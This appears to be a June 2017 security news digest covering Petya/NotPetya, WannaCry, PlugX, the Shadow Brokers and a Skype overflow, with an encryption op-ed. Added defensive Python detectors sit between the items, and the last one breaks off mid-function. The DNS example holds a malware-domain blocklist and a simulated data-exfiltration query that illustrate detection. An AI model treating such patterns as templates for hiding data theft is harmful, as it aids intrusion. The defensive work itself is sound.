WannaCry – The ransomware named WannaCry or WanaCrypt0r 2.0 attacked 300,000 computers in 150 countries this May (about 600 in the Czech Republic). Probably the most massive attack of its kind, it hit individual users but also universities, hospitals, railways and a number of other companies. To restore access it demanded a ransom in virtual currency worth 300 to 600 dollars (up to 14,000 crowns). The attack led to a rise in the share prices of cybersecurity companies. According to the latest reports, the program's authors are from China; originally there was speculation about a North Korean trail.

ExPetr or Petya – New malware, which analysts at Kaspersky Lab named ExPetr, hit a number of businesses and institutions around the world on Tuesday, including in the Czech Republic. Ukraine and Russia were hit particularly hard; companies in Western Europe and the United States also reported attacks. According to the antivirus company Eset, the Czech Republic is the ninth most affected country. According to Eset, the hackers demand a payment of $300 (roughly 7,000 CZK) from their victims, otherwise they will not release the infected and encrypted devices.


Video Game Firms Targeted With "Paranoid" PlugX Malware

28.6.2017 securityaffairs Virus

Companies in the video game industry and possibly other sectors have been targeted in attacks involving improved variants of the notorious PlugX remote access trojan (RAT).

Palo Alto Networks has spotted several interesting PlugX samples believed to have been used by the same threat actor. While the company has not provided any details on the actor behind these attacks, PlugX has often been used by China-linked threat groups.

The attacks start with a malicious Word document named “New Salary Structure 2017.doc,” which exploits CVE-2017-0199, an Office vulnerability that has been used by several threat actors, including ones linked to China and Iran.

The exploit downloads a Windows installer file and a PowerShell script that appears to be based on an open source Ruby exploitation library. Both files can load a shellcode designed to unpack the main PlugX DLL in memory. The shellcode is loaded only after the presence of a virtual environment is checked.

The PlugX samples analyzed by Palo Alto Networks contacted several Pastebin URLs containing the addresses of command and control (C&C) servers. The content is encoded via a technique that PlugX has been known to use.

Researchers have described these PlugX samples as “paranoid” due to the fact that the batch script responsible for executing the malware also attempts to clean up after itself by deleting all files created during installation and initial execution, registry keys, and UserAssist key entries.

“Clearly the attacker using this PlugX is paranoid about it being detected on disk, both in the registry and the file system. To top this off the script runs most of the deletion commands more than once,” experts said in a blog post. “The result is that there should be no evidence that the malware was ever executed on the disk, making it harder for forensics teams to identify how the malware got there, and meaning that memory or network based detection would be required to identify the intrusion.”
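The report says the Pastebin pages act as a dead drop for C&C addresses and that, because the installer wipes its on-disk traces, network-based detection is what defenders are left with. The following is an added example (not Palo Alto Networks' code) of that idea run over a constructed web-proxy log: it flags hosts that fetch raw pastes with a non-browser user agent, or that fetch the same raw paste repeatedly like a beacon. The log lines, hostnames, IP addresses and thresholds are all constructed for the demonstration.

```python
from collections import Counter, defaultdict

# Constructed proxy log: time, client IP, host, path, user agent (rest of line).
# None of these clients, pastes or agents come from the report.
SAMPLE_PROXY_LOG = """\
2017-06-27T09:00:01 10.1.1.20 www.example.com /index.html Mozilla/5.0 (Windows NT 6.1) Firefox/54.0
2017-06-27T09:00:05 10.1.1.20 pastebin.com /raw/AbCdEf12 Mozilla/5.0 (Windows NT 6.1) Firefox/54.0
2017-06-27T09:05:00 10.1.1.31 pastebin.com /raw/Zz99Qq11 -
2017-06-27T09:10:00 10.1.1.31 pastebin.com /raw/Zz99Qq11 -
2017-06-27T09:15:00 10.1.1.31 pastebin.com /raw/Zz99Qq11 -
2017-06-27T09:20:00 10.1.1.31 pastebin.com /raw/Zz99Qq11 -
2017-06-27T09:21:00 10.1.1.42 www.example.com /news Mozilla/5.0 (Windows NT 10.0) Chrome/59.0
"""

PASTE_HOSTS = {"pastebin.com"}          # public paste services used as dead drops
REPEAT_THRESHOLD = 3                    # constructed: same raw paste fetched this often


def parse_proxy_line(line: str) -> dict:
    """Split one constructed log line; the user agent may itself contain spaces."""
    ts, client, host, path, user_agent = line.split(maxsplit=4)
    return {"ts": ts, "client": client, "host": host, "path": path, "ua": user_agent}


def is_raw_paste_fetch(record: dict) -> bool:
    """Raw paste bodies (/raw/...) are what a program, not a person, fetches."""
    return record["host"] in PASTE_HOSTS and record["path"].startswith("/raw/")


def looks_like_browser(user_agent: str) -> bool:
    """Crude but sufficient here: real browsers announce themselves as Mozilla/...."""
    return user_agent.startswith("Mozilla/")


def detect_dead_drops(log_text: str, repeat_threshold: int = REPEAT_THRESHOLD) -> dict:
    """Return {client_ip: [reasons]} for clients whose paste traffic looks automated."""
    findings = defaultdict(set)
    fetch_counts = Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        record = parse_proxy_line(line)
        if not is_raw_paste_fetch(record):
            continue
        key = (record["client"], record["path"])
        fetch_counts[key] += 1
        if not looks_like_browser(record["ua"]):
            findings[record["client"]].add("non-browser user agent fetched a raw paste")
        if fetch_counts[key] >= repeat_threshold:
            findings[record["client"]].add("same raw paste fetched repeatedly (beacon-like)")
    return {client: sorted(reasons) for client, reasons in findings.items()}


if __name__ == "__main__":
    for client, reasons in detect_dead_drops(SAMPLE_PROXY_LOG).items():
        print(client, "->", "; ".join(reasons))
```

A single browser visit to a raw paste (10.1.1.20 above) is not reported, which keeps the analyst queue small; the pairing of a non-browser agent with periodic refetches of one paste is the pattern worth a look.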

Researchers noticed that, in the first half of this year, the developers of these “paranoid” samples also added mechanisms for bypassing application whitelisting techniques possibly used by their targets. They achieved this by using code made available on GitHub by a user named “SubTee” and, in some cases, they also added some custom code.

While Palo Alto Networks reported that these attacks appear to mainly target the video game industry, the company believes other types of organizations that are outside its telemetry may have been targeted as well.


Petwrap Ransomware massive attack – 24 hours later
28.6.2017 securityaffairs Ransomware

A new strain of the infamous Petya ransomware, dubbed Petwrap, is infecting computers in several countries, mostly in Ukraine and Russia.
This is the second massive ransomware-based attack in a few weeks. Like WannaCry, the Petwrap ransomware exploits the MS17-010 SMB remote code execution vulnerability, the so-called EternalBlue, which Microsoft patched in March 2017.

Banks, financial institutions, businesses, energy firms, telecoms and systems in critical infrastructure were infected by the malware. Among the victims is the giant Maersk, which confirmed the attack in an official statement on its website:

“We can confirm that Maersk IT systems are down across multiple sites and business units due to a cyber attack.”

Kaspersky telemetry on Petya ransomware

The “Eternal Blue” exploit was developed by the US National Security Agency; its code was leaked in April by the hacker group Shadow Brokers.

Analysis conducted by experts revealed that Petwrap also uses other tricks to spread inside target networks.

According to the experts at Russian security firm Group-IB, the malware leverages a tool called “LSADump,” which can be used to collect login credentials from Windows computers and domain controllers on the network.

Group-IB @GroupIB_GIB
New #Petya uses #LSADump to get Admin password and infect all network. There is no need for #EternalBlue vulnerable PCs. #infosec
8:43 PM - 27 Jun 2017
While I was writing this, news also emerged of illustrious victims in the US, such as the global law firm DLA Piper, which experienced severe issues with its systems.

What is the attackers’ motivation?

According to security experts, the attack presents various anomalies that led them to believe the hackers were operating for sabotage.

According to Nicholas Weaver, a security researcher at the International Computer Science Institute, Petya has been designed to be destructive while masquerading as ransomware.

Weaver highlighted numerous anomalies in the ransomware-based attack, such as the use of a single Bitcoin address for every victim and the fact that the Petwrap operators urge victims to communicate with them via an email address, while most ransomware requires victims to use Tor for communications.

“I’m willing to say with at least moderate confidence that this was a deliberate, malicious, destructive attack or perhaps a test disguised as ransomware,” Weaver said in a comment published by Brian Krebs. “The best way to put it is that Petya’s payment infrastructure is a fecal theater.”

I suggest taking a look at the Yara rules and IOCs published by Kaspersky in the following analysis:

Schroedinger’s Pet(ya)


Yesterday's wave of ransomware hit the Czech Republic too. Petya is more insidious than WannaCry
28.6.2017 Živě.cz Viruses
Another massive wave of ransomware has hit Eastern European countries in particular
Petya encrypts the MBR and can infect even a patched system
The attackers have made about 9 thousand dollars
The ransom note displayed after the files are encrypted.
The most affected country was Ukraine, where the malware knocked out supermarkets, for example. Banks and their ATMs were hit as well. The attackers have so far collected about 9,200 dollars.
This is how Petya announces itself after the system restarts. If you see this screen, turn the computer off immediately.
A month after the WannaCry malware frightened the world, another global infection spread yesterday on a similar scale. Again it is ransomware exploiting a hole in the SMB protocol, and again Eastern European countries are the most affected. This time the Czech Republic was hit too; according to Eset it is among the ten most affected countries.


The infection is designated Win32/Diskcoder.C Trojan and has been known since last year under the name Petya. To some extent it works very much like WannaCry: it spreads via the unpatched local-network file sharing protocol, but a considerable number of computers were also encrypted because someone opened a dangerous e-mail attachment. The PsExec system utility, which normally serves for remote installation of applications, can also be abused. That is why even a system with the updates released after the WannaCry outbreak installed can be attacked.

Unlike WannaCry and most ransomware, Petya does not encrypt individual files on the disk but the MBR (Master Boot Record). The system thus loses access to its boot record, and instead of the system starting, the user sees only the ransom demand after the computer restarts. Only if this mechanism fails does Petya begin encrypting other files on the disk as well.

This mode of operation is on the one hand insidious because of its speed: encrypting the tiny MBR record takes only a few seconds. On the other hand, the data itself is not damaged, and if the file encryption process has not started, the files can be recovered by placing the disk in an uninfected machine.
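Because the article's point is that only the 512-byte boot sector is touched at first, a defender can baseline that sector and check it later. The following is an added example (not Živě.cz's or any vendor's code): it parses an MBR, validates the 0x55AA boot signature, lists the partition table, and compares a SHA-256 of the boot code against a stored baseline. The sample sector is constructed in `build_sample_mbr()`; `read_mbr()` shows how the same check would be run against a real device, which requires administrator rights.

```python
import hashlib
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 446          # 446 bytes of boot code, then 4 x 16-byte entries
BOOT_SIGNATURE = b"\x55\xaa"          # last two bytes of every valid MBR


def read_mbr(device_path: str) -> bytes:
    """Read the first sector of a raw disk, e.g. "/dev/sda" on Linux or "\\.\PhysicalDrive0" on Windows (needs admin)."""
    with open(device_path, "rb") as disk:
        return disk.read(SECTOR_SIZE)


def is_valid_mbr(sector: bytes) -> bool:
    """An overwritten or encrypted sector almost never keeps the size and signature intact."""
    return len(sector) == SECTOR_SIZE and sector[510:512] == BOOT_SIGNATURE


def parse_mbr(sector: bytes) -> dict:
    """Return the boot-code hash and the non-empty partition entries."""
    if not is_valid_mbr(sector):
        raise ValueError("not a valid 512-byte MBR with a 0x55AA signature")
    partitions = []
    for index in range(4):
        offset = PARTITION_TABLE_OFFSET + 16 * index
        # status(1) CHS start(3) type(1) CHS end(3) LBA start(4) sector count(4)
        status, ptype, lba_start, sector_count = struct.unpack_from("<B3xB3xII", sector, offset)
        if ptype == 0:                    # empty slot
            continue
        partitions.append({
            "index": index,
            "bootable": status == 0x80,
            "type": ptype,
            "lba_start": lba_start,
            "sectors": sector_count,
        })
    return {
        "bootcode_sha256": hashlib.sha256(sector[:PARTITION_TABLE_OFFSET]).hexdigest(),
        "partitions": partitions,
    }


def bootcode_matches_baseline(sector: bytes, baseline_sha256: str) -> bool:
    """Compare the current boot code with the hash recorded on a known-clean machine."""
    return is_valid_mbr(sector) and parse_mbr(sector)["bootcode_sha256"] == baseline_sha256


def build_sample_mbr() -> bytes:
    """Constructed MBR: placeholder boot code plus one bootable NTFS (0x07) partition at LBA 2048."""
    bootcode = b"\xfa\x33\xc0" + b"\x90" * (PARTITION_TABLE_OFFSET - 3)   # cli; xor ax,ax; nops
    entry = struct.pack("<B3xB3xII", 0x80, 0x07, 2048, 204800)
    table = entry + b"\x00" * 48                                           # three empty slots
    return bootcode + table + BOOT_SIGNATURE


if __name__ == "__main__":
    clean = build_sample_mbr()
    baseline = parse_mbr(clean)["bootcode_sha256"]
    tampered = bytearray(clean)
    tampered[0] ^= 0xFF                     # simulate the boot code being replaced
    print("clean matches baseline:", bootcode_matches_baseline(clean, baseline))
    print("tampered matches baseline:", bootcode_matches_baseline(bytes(tampered), baseline))
```

The baseline hash belongs on a different machine or in a monitoring system, not on the disk being checked; a bootkit that replaces the boot code could otherwise replace the baseline too.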


Although it might seem that with such a massive spread ransomware must be a gold mine for the attackers, the opposite is usually true. Only a fraction of victims actually decide to pay the ransom. In this case, according to the transaction list of the bitcoin wallet, the attackers collected about 9,250 dollars, roughly 214 thousand crowns. Given that they demand about 300 dollars from each victim, at most 30 victims paid.

What is bizarre, though, is the system the attackers intended to use to collect money from victims. Everything was to be built solely on an e-mail conversation, with the mailbox hosted at the German provider Posteo. That mailbox was quickly blocked, so victims cannot even contact the attackers. From the attackers' point of view, it is no big business.


If ransomware built on the Win32/Diskcoder.C sample gets into your system, the best response is to turn the computer off immediately. While encrypting the boot record takes only a few seconds, making the rest of the data inaccessible can take several hours. So after the restart (which Petya forces), switch the computer off at once. That is the moment when it displays the ransom demand and begins encrypting further data.

Once again, we must stress above all the need for automatic system updates. They close most security holes before attackers can exploit them. With malware spreading through unpatched SMB, running an unpatched system is moreover highly irresponsible: other computers on the network can easily become infected.


Ukraine and other countries face an unprecedented cyber attack. Someone is attacking banks, the government, petrol stations and the energy sector
28.6.2017 Živě.cz BigBrother
Updated: It appears that Ukraine was not the only target; similar activity by the unknown saboteurs is also being reported by some large companies outside the country. The Wall Street Journal writes, for example, about the shipping company A.P. Moeller-Maersk A/S and the advertising corporation WPP Group PLC, and the Russian oil company PAO Rosneft is also on the list of targets.

According to local media, Ukraine has been dealing in recent hours with a massive cyber attack that has hit both the government's computer network and some banking systems. According to the Ukrainian news site RBC, some bank customer systems stopped working as a result of the attacks, and ordinary transfers and other operations slowed down.

Deputy Prime Minister Pavlo Rozenko also complained about computer crashes, posting on his Facebook account a telling photograph showing a Windows disk partition check.

Other victims were reportedly the Ukrainian energy companies Kyivenergo and Ukenergo, whose websites are unavailable. Boryspil airport, the WOG petrol station network and several other organisations are also reporting problems.

This is the most massive attack in recent times. Ukrainian authorities last dealt with a power grid outage last winter, also caused by hackers, and after an extensive audit antivirus companies warned that it may have been only a technological rehearsal and that a much bigger attack awaited the country.


The Dark Art of Encryption
28.6.2017 securityaffairs Krypto

The current crisis of encryption is in part due to a lack of intelligence. The governments of the UK and Australia are talking about bans, regulations, requirements and other legal structures to address the perceived problem of “going dark”.
The problem, inside the nutshells that are the May and Turnbull governments, is that encryption allows [evil-doer name fill in the blank here] to communicate where the legal authorities cannot monitor them. Thus, due to the lack of intelligence, the May and Turnbull governments propose to find some way to regulate encryption.

When I mention lack of “intelligence” I am not making reference to the collection of information of military or political value. I am using intelligence in the traditional form of the ability to acquire and apply knowledge. To those who have been placed, elected or seized power, understanding the technology is less important than trying to wrestle with its consequences.

Thus, for argument's sake, I will try to keep this simple for the simple-minded leadership. If the value 1 represents your message and the value 4 represents the secret code key, then 1 plus 4 will give you the coded message 5. To decode the secret message, simply apply the reverse by subtracting the secret code key 4 from the secret message 5 and you obtain the original message 1. As shown below:

SIMPLE ENCRYPTION

1 = message
4 = code key
1 + 4 = 5 coded message
5 - 4 = 1 decoded message
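The 1 + 4 = 5 illustration is one byte of a general scheme: add a key byte to each message byte modulo 256, subtract it to decode. As an added example (not part of the original column), the following generalises that arithmetic to whole messages with a random key, which is exactly a one-time pad, and also shows the caveat the arithmetic hides: if the same key is added to two messages, the key cancels out of the difference of the ciphertexts, so the key must never be reused. The sample messages are constructed.

```python
import secrets


def generate_key(length: int) -> bytes:
    """Fresh random key with one byte per message byte (a one-time pad)."""
    return secrets.token_bytes(length)


def encrypt(message: bytes, key: bytes) -> bytes:
    """Add each key byte to the matching message byte, modulo 256 (the column's 1 + 4 = 5)."""
    if len(key) < len(message):
        raise ValueError("key must be at least as long as the message")
    return bytes((m + k) % 256 for m, k in zip(message, key))


def decrypt(ciphertext: bytes, key: bytes) -> bytes:
    """Subtract the same key byte again, modulo 256 (the column's 5 - 4 = 1)."""
    if len(key) < len(ciphertext):
        raise ValueError("key must be at least as long as the ciphertext")
    return bytes((c - k) % 256 for c, k in zip(ciphertext, key))


def difference_without_key(ct_a: bytes, ct_b: bytes) -> bytes:
    """What an eavesdropper computes when one key was used for two messages.

    (m_a + k) - (m_b + k) == m_a - m_b (mod 256): the key cancels, so the byte-wise
    difference of the two plaintexts leaks without knowing k at all.
    """
    if len(ct_a) != len(ct_b):
        raise ValueError("ciphertexts must have equal length")
    return bytes((a - b) % 256 for a, b in zip(ct_a, ct_b))


if __name__ == "__main__":
    key = generate_key(32)
    secret = b"meet at the usual place"      # constructed sample message
    boxed = encrypt(secret, key)
    assert decrypt(boxed, key) == secret
    # Key reuse: the plaintext difference falls straight out of the two ciphertexts.
    other = b"meet at the other place"       # same length, same key: a mistake
    leaked = difference_without_key(boxed, encrypt(other, key))
    assert leaked == bytes((a - b) % 256 for a, b in zip(secret, other))
    print("round trip ok; reusing the key leaks the plaintext difference")
```

With a fresh, uniformly random key per message the ciphertext carries no information about the message, which is the sense in which the column's point holds: there is nothing in the arithmetic for a regulator to take hold of.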

The question for the political and ruling caste is – exactly how are you going to regulate that?

The obvious answer is you can’t. Thus, the dilemma the ruling elite have found. In order to stop the [evil-doer name fill in the blank here] from using encryption you must ban math and pray the bad guys have not already graduated from elementary school.

It would seem that to ban encryption is a futile effort. However, that does not seem to stop the clueless political caste from trying. It is almost like Galileo fighting the Pope. Yes, I understand the church is all powerful and can cut my head off but that still doesn’t stop the Earth from revolving around the sun.

Thus, the ruling caste has focused their bans toward the so-called providers such as WhatsApp, Telegram, Signal and others. The problem with this selected approach is that all you do is stop the general public from having the advantages of encryption while the evil-doers will simply cook up their own, something that ISIS and Al Qaeda have already done.

What do the May and Turnbull governments get out of this fruitless endeavor? Not much, other than using the bogeyman of “technology” to scoop up some of the ignorant voters into thinking they are safe… until the next attack. Simply put, they are playing on the technophobia of the public, which is often mirrored in their own technophobia at failing to understand what can be explained with a first-grade math problem.

In fact, even the more totalitarian-minded regimes in Moscow and Beijing are rapidly growing frustrated at their inability to regulate math. It would seem that the general public in all nations is better served if the master isn’t always clued in on everything being said behind his back. So far the only government on Earth which seems capable of addressing the problem is North Korea, where all users are registered and all computers are closely monitored.

Therein lies part two of the problem of encryption. The academic and information security communities have long kept the encryption magic in a special box away from the public. It is this form of wizard artful dodging that has created the clueless elite and even more clueless users.

Many in both technical communities act like elite snobs of their own caste, refusing to use any encryption that has not been “verified” by open source code. This is ironic since they demand the encryption code to be open and free for all to use (steal) while the computer operating systems code they are designed to run on remains proprietary and a very closely guarded secret. It is similar to demanding to know the exact molecular makeup of the ketchup for your 12 course dinner which is being prepared by a secret team of chefs using secret ingredients and classified cooking methods.

The other part revolves around the geek fad syndrome of wizards. The latest fancy of super-duper code systems has often resulted in getting people burned. The community went gaga over the Dual Elliptical Curve encryption security and even allowed the US government to turn it into a standard, little knowing that the NSA had already broken the coding system. Thus, the fad syndrome laid the foundation for a whole generation of obsolete and vulnerable hardware and software.

All this brings us back to the heart of the 12 course meal – your computer operating system. The source code to your operating system, with few exceptions, is not available and for all practical purposes remains a black-box. This box has been hacked twelve times over since last Sunday. Many of the hacks are done by the very same “intelligence” agencies now demanding the easy – but useless – solution of banning encryption.

Unfortunately, these boxes are now hooking up to all sorts of things like airplanes, the power grid, water plants, sewage facilities, the stock markets, cars and even the lowly toaster. They also hook up to things like nuclear power plants and major weapon systems like missiles, bombers, and aircraft carriers. The recent CIA hacks put on for display by Wikileaks are a clear demonstration that the digital world we have built is only as safe as the boxes and their security systems.

The only chance we have is to encrypt as much as possible or we are doomed. The only way to survive in the future may be to go dark.

“A dark world where nuclear power plants can’t be hacked is safer than a bright world in which they can,” Bruce Schneier.


Akamai Launches New DNS Security Product

28.6.2017 securityweek Safety
Content delivery network and cloud services provider Akamai announced on Tuesday the launch of a new product designed to protect enterprises against malware, phishing and data exfiltration attempts through the analysis of DNS requests.

The new solution, Enterprise Threat Protector, aims to address the risks associated with DNS communications. According to Akamai, the product leverages threat data from the company’s Cloud Security Intelligence system to determine the “intent” of DNS requests and detect potentially targeted attacks.

Enterprise Threat Protector analyzes an organization’s recursive DNS requests and blocks connections to domains associated with suspicious or malicious activity, including malware drop sites, ransomware, and phishing pages.

Akamai says the product can also disrupt communications between infected hosts and command and control (C&C) servers. It’s not uncommon for malware to rely on DNS for data exfiltration and Enterprise Threat Protector should prevent attempts to send data outside the protected organization.
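The two decisions the product is described as making, matching a recursive query against known-bad domains and spotting DNS used as an exfiltration channel, can be shown in miniature. The following is an added example, not Akamai's code and not how Enterprise Threat Protector is implemented: it classifies query names from a constructed resolver log against a constructed blocklist and flags names whose subdomain part is long and high-entropy, the shape that encoded data takes when it is smuggled out in DNS labels. Domain names, thresholds and log lines are all constructed.

```python
import math
from collections import Counter

# Constructed blocklist standing in for threat intelligence (placeholder names, not real IoCs).
BLOCKED_DOMAINS = {"malware-drop.example", "phish-login.example"}
MAX_SUBDOMAIN_CHARS = 40     # constructed threshold: ordinary hostnames are far shorter
ENTROPY_THRESHOLD = 3.5      # bits per character; encoded payloads approach 4 (hex) or more

# Constructed recursive-resolver log: time, client, query name, query type.
SAMPLE_QUERY_LOG = """\
2017-06-28T10:00:00 10.0.0.15 www.example.com A
2017-06-28T10:00:02 10.0.0.15 cdn.malware-drop.example A
2017-06-28T10:00:03 10.0.0.22 3a9f1c4d7e2b8a6f0c5d9e1b2a3f4c5d.6e7f8091a2b3c4d5e6f70819.tunnel.example A
2017-06-28T10:00:04 10.0.0.22 mail.example.org MX
"""


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; random-looking encodings score high, words score low."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_name(qname: str):
    """Return (registered domain, subdomain characters without dots).

    Naive: the last two labels are taken as the registered domain. A production
    filter would use the public suffix list (co.uk and friends).
    """
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), "".join(labels[:-2])


def classify_query(qname: str) -> str:
    """'block:blocklist', 'block:suspected-exfil' or 'allow'."""
    base, sub = split_name(qname)
    if base in BLOCKED_DOMAINS:
        return "block:blocklist"
    if len(sub) > MAX_SUBDOMAIN_CHARS and shannon_entropy(sub) > ENTROPY_THRESHOLD:
        return "block:suspected-exfil"
    return "allow"


def filter_log(log_text: str) -> list:
    """Classify every query in a constructed log; returns (client, qname, qtype, verdict)."""
    results = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype = line.split()
        results.append((client, qname, qtype, classify_query(qname)))
    return results


if __name__ == "__main__":
    for client, qname, qtype, verdict in filter_log(SAMPLE_QUERY_LOG):
        print(f"{verdict:22} {client} {qtype} {qname}")
```

The entropy rule alone would also catch content-hash hostnames used by legitimate CDNs, which is why a real deployment pairs it with allow-lists and per-client volume over time rather than judging one query in isolation.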

Security teams can also utilize the new product to improve compliance and enforce acceptable use policies.

Since Enterprise Threat Protector is a cloud-based solution, it’s highly scalable and it can be configured and deployed within minutes without the need for new hardware or complex changes to the network.

"Our customers' security teams are facing adversaries that consistently shift attack tactics and vectors, specifically seek out gaps in defenses and can be incredibly persistent in attempts to find weaknesses in a company's security posture. Enterprises need quick-to-deploy and easy-to-manage cloud-based solutions that can address these unique issues as part of their overall security strategy," said John Summers, vice president and general manager of Enterprise Products at Akamai. "With Enterprise Threat Protector, we're providing our customers with a powerful, intelligent solution that can help detect and stop targeted attacks in their tracks."


'Shadow Brokers' Threatens to Unmask A Hacker Who Worked With NSA
28.6.2017 thehackernews BigBrothers
The Shadow Brokers, a notorious hacking group that leaked US cyberweapons — which were also abused by the recent ransomware disasters WannaCry and Petya or NotPetya — has now threatened to unmask the identity of a former hacker who worked for the NSA.
Besides this, the Shadow Brokers group has also doubled the price of its monthly subscription for NSA-built hacking tools and zero-day exploits from 100 ZEC (Zcash) to 200 ZEC, which is around $64,400 USD.
Moreover, the hacking group has also announced a VIP service for people whose questions about the leaked hacking tools and exploits the group will answer.
To subscribe to the VIP service, one has to make a one-time payment of 400 ZEC (around US$128,800).
Last month, the Shadow Brokers announced it would release more zero-day exploits and hacking tools developed by the US spy agency every month from June 2017, but only to private members who subscribe for exclusive access to the future leaks.
The Shadow Brokers' June data dump costs 100 ZEC, but after looking at successful growth in the number of subscribers for this month, the group said it is raising the price for the next month's subscription.
Threatens to Unmask Equation Group Hacker
In typically broken English, the mysterious hacking group threatened to unmask a former member of the NSA's elite hacking group called Equation Group, who developed several hacking tools to break into Chinese organizations.
The Shadow Brokers did not reveal much about the former Equation Group member, except that the person is living in Hawaii and is currently a "co-founder of a new security company and is having much venture capital."
The group, which refers to the Equation Group member as "doctor," made the threat because of his or her "ugly tweets" targeting the Shadow Brokers.
"TheShadowBrokers is having special invitation message for 'doctor' person theshadowbrokers is meeting on Twitter. 'Doctor' person is writing ugly tweets to theshadowbrokers," the group said. "Then doctor person is deleting ugly tweets, maybe too much drinking and tweeting?"
"TheShadowBrokers is hoping 'doctor' person is deciding to subscribe to dump service in July. If theshadowbrokers is not seeing subscription payment with corporate email address of doctor@newsecuritycompany.com then theshadowbrokers might be taking tweets personally and dumping data of 'doctor' persons hacks of China with real id and security company name."
Well, that's enough of a threat.
As June comes to an end, it seems the Shadow Brokers subscribers who paid in June will start receiving zero-day exploits and hacking tools in the first week of July.
Although what the June dump would contain is not clear at the moment, the group's last announcement claimed that the upcoming data dump would include:
Compromised data from banks and Swift providers.
Exploits for operating systems, including Windows 10.
Exploits for web browsers, routers, and smartphones.
Stolen network information from Russian, Chinese, Iranian, and North Korean nuclear missile programs.


Critical Skype Bug Lets Hackers Remotely Execute Malicious Code
28.6.2017 thehackernews Vulnerability
A critical vulnerability has been discovered in Skype, the Microsoft-owned and hugely popular free web messaging and voice calling service, that could allow hackers to remotely execute malicious code and crash systems.
Skype is a free online service that allows users to communicate with peers by voice, video, and instant messaging over the Internet. The service was acquired by Microsoft Corporation in May 2011 for US$8.5 Billion due to its worldwide popularity.
Security researcher Benjamin Kunz-Mejri from Germany-based security firm Vulnerability Lab discovered the previously unknown stack buffer overflow vulnerability, which is documented in CVE-2017-9948, in Skype Web's messaging and call service during a team conference call.
The vulnerability is considered a high-security risk with a 7.2 CVSS score and affects Skype versions 7.2, 7.35, and 7.36 on Windows XP, Windows 7 and Windows 8, Mejri said in a public security disclosure published on Monday.
"The issue can be exploited remotely via session or by local interaction. The problem is located in the print clipboard format & cache transmit via remote session on Windows XP, Windows 7, Windows 8 and Windows 10. In Skype v7.37 the vulnerability is patched," the security firm wrote.
No User Interaction Needed
What's worse? The stack buffer overflow vulnerability doesn't require any user interaction and only requires a low-privilege Skype user account.
So, an attacker can remotely crash the application "with an unexpected exception error, to overwrite the active process registers," or even execute malicious code on a target system running the vulnerable Skype version.
The issue resides in the way Skype uses the 'MSFTEDIT.DLL' file in case of a copy request on local systems.
Here's How Attackers can Exploit this Flaw
According to the vulnerability report, attackers can craft a malicious image file and then copy and paste it from a clipboard of a computer system into a conversation window in the Skype application.
Once this image is hosted on a clipboard on both the remote and the local systems, Skype experiences a stack buffer overflow, causing errors and crashing the application, which left the door open for more exploits.
"The limitation of the transmitted size and count for images via print of the remote session clipboard has no secure limitations or restrictions. Attackers [can] crash the software with one request to overwrite the EIP register of the active software process," researchers from Vulnerability Lab says.
"Thus allows local or remote attackers to execute own codes on the affected and connected computer systems via the Skype software," they added.
Proof-of-Concept Code Released
The security firm has also provided proof-of-concept (PoC) exploit code that you can use to test the flaw.


Vulnerability Lab reported the flaw to Microsoft on 16th May, and Microsoft fixed the issue and rolled out a patch on 8 June in Skype version 7.37.178.
If you are a Skype user, make sure you run the latest version of the application on your system in order to protect yourself from attacks based on this vulnerability.


Another big ransomware attack has hit unpatched computers. Ukraine is the most affected

28.6.2017 CNEWS.cz Viruses
The attack is global and is hitting the computers of various institutions.

Yesterday evening, security firms reported a new massive ransomware attack that began on 27 June in the afternoon. Although it is a global campaign, institutions in Ukraine are the most affected. In addition to a number of private companies, banks, energy companies, transport services and also the government were hit.

According to Eset, other significantly affected countries include Italy, Israel and Serbia. Avast reports rapidly growing numbers of cases in Russia, India, France, Spain and the Netherlands. The ransomware is also rampant in Central Europe. The Czech Republic is the ninth most affected country. Security experts estimate that it is a variant of the malicious code called Petya.

"The new ransomware resembles the well-known malicious code Petya. If it manages to infiltrate the MBR (Master Boot Record), the computer's main boot record, it encrypts the whole disk. Otherwise it encrypts individual files, just like the Mischa ransomware," says Robert Lipovský, an analyst at Eset. According to the company, a ransom of 300 dollars is demanded for the data. (The corresponding amount is demanded in bitcoins.) It identifies the malware as Win32/Diskcoder.C Trojan.

"At the moment we have stopped 12,000 attack attempts by this modification of the Petya ransomware, which abuses the EternalBlue exploit. We also know from our data that 38 million computers we checked last week still do not have their software patched and are therefore potentially easy to compromise. The real number of easily attackable computers will be even higher," says Jakub Křoustek, a security expert at Avast.


Fabian RODES @FabianRODES
"Mum, why are people leaving the plane... why isn't the film working anymore!" #petya
19:21, 27. Jun. 2017
The vulnerability used

So once again the hole in the SMB protocol that WannaCry recently exploited is in play. A patch for SMB has been available since March, but evidently many computers are still unpatched. Incidentally, Microsoft will gradually remove the SMB1 protocol from Windows.

Tools used in the attack

PsExec, a tool for remote software installation, is also used in the attack. According to Check Point, Loki Bot, which focuses on stealing login credentials, may also be involved in the attack. This malware can infect you through a modified RTF document that downloads the malware itself using a script. Loki Bot's involvement is, however, still unconfirmed.

How the infection spreads in the local network

When Petya gets onto a computer, it scans the local network using ARP requests. It then communicates via the SMB protocol with the machines on that network (the ones that respond), and later also starts communicating via HTTP. The communication ends once the machines are encrypted. That, in a nutshell, is how Check Point describes the course of the attack.
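The sequence Check Point describes, an ARP sweep of the subnet followed by SMB connections to the hosts that answered, is visible to anyone collecting flow records, and it looks nothing like a workstation's normal day. The following is an added example (not Check Point's, Avast's or Eset's code) of a detection over constructed flow records: a source is reported when it ARP-probes many distinct addresses and then opens tcp/445 to many distinct hosts. The record format, addresses and thresholds are constructed for the demonstration.

```python
from collections import defaultdict

ARP_FANOUT_THRESHOLD = 20    # constructed: distinct addresses ARP-probed by one source
SMB_FANOUT_THRESHOLD = 5     # constructed: distinct hosts one source connects to on tcp/445


def parse_flow(line: str) -> dict:
    """Constructed record format: "<time> <src> -> <dst> <proto>[/<port>]"."""
    ts, src, arrow, dst, proto = line.split()
    if arrow != "->":
        raise ValueError(f"bad flow line: {line!r}")
    return {"ts": ts, "src": src, "dst": dst, "proto": proto}


def detect_spreaders(lines, arp_threshold=ARP_FANOUT_THRESHOLD,
                     smb_threshold=SMB_FANOUT_THRESHOLD) -> dict:
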